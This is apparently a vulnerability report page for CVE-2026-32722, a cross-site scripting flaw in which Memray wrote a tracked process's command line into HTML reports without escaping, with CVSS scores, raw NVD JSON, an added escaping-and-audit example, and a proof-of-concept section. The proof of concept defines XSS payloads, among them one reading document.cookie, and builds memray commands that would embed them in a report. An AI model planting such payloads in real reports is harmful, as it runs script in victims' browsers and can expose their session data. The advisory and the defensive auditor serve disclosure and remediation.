Security Vulnerability Report
CVE-2026-32722 CVSS 3.6 LOW


Published: 2026-03-18 22:16:25
Last Modified: 2026-03-19 19:21:29

Description

Memray is a memory profiler for Python. Prior to Memray 1.19.2, Memray rendered the command line of the tracked process directly into generated HTML reports without escaping. Because there was no escaping, attacker-controlled command line arguments were inserted as raw HTML into the generated report. This allowed JavaScript execution when a victim opened the generated report in a browser. Version 1.19.2 fixes the issue.
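An added example, not Memray's own code, that contrasts the unescaped rendering the description refers to with an html.escape() fix, and adds a small auditor that flags injected script elements or on* event-handler attributes in a rendered report. The template, function names and the sample argv are constructed for illustration.

```python
# Added example (not Memray's code): vulnerable vs. hardened rendering of a
# tracked process's command line into an HTML report, plus a report auditor.
import html
from html.parser import HTMLParser

# Constructed sample argv: a hostile argument of the kind the advisory describes.
SAMPLE_ARGV = ["python", "app.py", "--name=<script>alert(1)</script>"]

# Hypothetical report template; Memray's real template is not reproduced here.
TEMPLATE = "<html><body><p>Command line: {cmdline}</p></body></html>"


def render_unescaped(argv):
    """The vulnerable pattern: argv is joined and interpolated as raw HTML."""
    return TEMPLATE.format(cmdline=" ".join(argv))


def render_escaped(argv):
    """The fix: escape the untrusted string first, so markup becomes text."""
    return TEMPLATE.format(cmdline=html.escape(" ".join(argv), quote=True))


class InjectedMarkupAuditor(HTMLParser):
    """Collects <script> elements and on* attributes seen in a document."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            # html.parser lowercases attribute names for us
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")


def audit_report(report_html):
    """Return a list of injected-markup findings; empty means clean."""
    auditor = InjectedMarkupAuditor()
    auditor.feed(report_html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    print("unescaped:", audit_report(render_unescaped(SAMPLE_ARGV)))
    print("escaped:  ", audit_report(render_escaped(SAMPLE_ARGV)))
```

Running the auditor over reports produced by an unpatched version is a practical way to tell whether a given report file carries injected markup before it is opened in a browser.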

CVSS Details

CVSS Score: 3.6
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

The score above is the Secondary (CNA) assessment. The Primary (NVD) assessment in the raw record below rates the issue 6.1 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, and the weakness is classified as CWE-79.

Configurations (Affected Products)

cpe:2.3:a:bloomberg:memray:*:*:*:*:*:python:*:* - VULNERABLE
Bloomberg Memray < 1.19.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32722 PoC - Memray HTML Injection leading to XSS
# This PoC demonstrates how attacker-controlled command line arguments
# can inject malicious JavaScript into Memray-generated HTML reports
import subprocess
import os
import time

# Step 1: Create a target Python script (written to disk so memray can run it)
target_script = '''
import sys
import time

# Simulate processing command line arguments
# In real attack, these would contain XSS payloads
for i in range(100):
    time.sleep(0.01)

if __name__ == "__main__":
    print("Processing with args:", sys.argv)
'''
target_path = "target.py"
with open(target_path, "w") as f:
    f.write(target_script)

# Step 2: Create the XSS payload
# The payload will be passed as command line argument
xss_payload = "--test=<script>alert(document.cookie)</script>"

# Step 3: Run Memray with the malicious command line argument
# The capture file records the tracked process's command line, payload included
cmd = [
    "memray", "run",
    "-o", "memray_report.bin",
    target_path,
    xss_payload,
]

# Alternative: Direct command with XSS in arguments
malicious_cmd = [
    "memray", "run",
    "-o", "memray_output.bin",
    "python", "-c", "import time; [time.sleep(0.01) for _ in range(100)]",
    "--param=<img src=x onerror=alert(document.domain) />",
]

# Step 4: Convert the capture file to an HTML report
# (the original listing used "memray tree", which renders to the terminal, not HTML)
# The resulting HTML will contain the XSS payload unescaped
convert_cmd = ["memray", "flamegraph", "memray_report.bin", "-o", "memray_report.html"]

print("[*] CVE-2026-32722 - Memray XSS via HTML Injection")
print("[*] Payload:", xss_payload)
print("[*] When victim opens the generated HTML report in browser,")
print("[*] the JavaScript will execute automatically.")

References

https://github.com/bloomberg/memray/commit/ba6e4e2e9930f9641bed7adfdf43c8e2545ce249 (Patch)
https://github.com/bloomberg/memray/releases/tag/v1.19.2 (Product, Release Notes)
https://github.com/bloomberg/memray/security/advisories/GHSA-r5pr-887v-m2w9 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-32722",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T22:16:24.670",
    "lastModified": "2026-03-19T19:21:28.677",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Memray is a memory profiler for Python. Prior to Memray 1.19.2, Memray rendered the command line of the tracked process directly into generated HTML reports without escaping. Because there was no escaping, attacker-controlled command line arguments were inserted as raw HTML into the generated report. This allowed JavaScript execution when a victim opened the generated report in a browser. Version 1.19.2 fixes the issue."
      },
      {
        "lang": "es",
        "value": "Memray es un perfilador de memoria para Python. Antes de Memray 1.19.2, Memray renderizaba la línea de comandos del proceso rastreado directamente en los informes HTML generados sin escapar. Debido a que no había escape, los argumentos de línea de comandos controlados por el atacante se insertaban como HTML sin procesar en el informe generado. Esto permitía la ejecución de JavaScript cuando una víctima abría el informe generado en un navegador. La versión 1.19.2 corrige el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
            "baseScore": 3.6,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:bloomberg:memray:*:*:*:*:*:python:*:*",
                "versionEndExcluding": "1.19.2",
                "matchCriteriaId": "09B42289-015F-4BFB-9F71-1299C86C535D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/bloomberg/memray/commit/ba6e4e2e9930f9641bed7adfdf43c8e2545ce249",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/bloomberg/memray/releases/tag/v1.19.2",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/bloomberg/memray/security/advisories/GHSA-r5pr-887v-m2w9",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}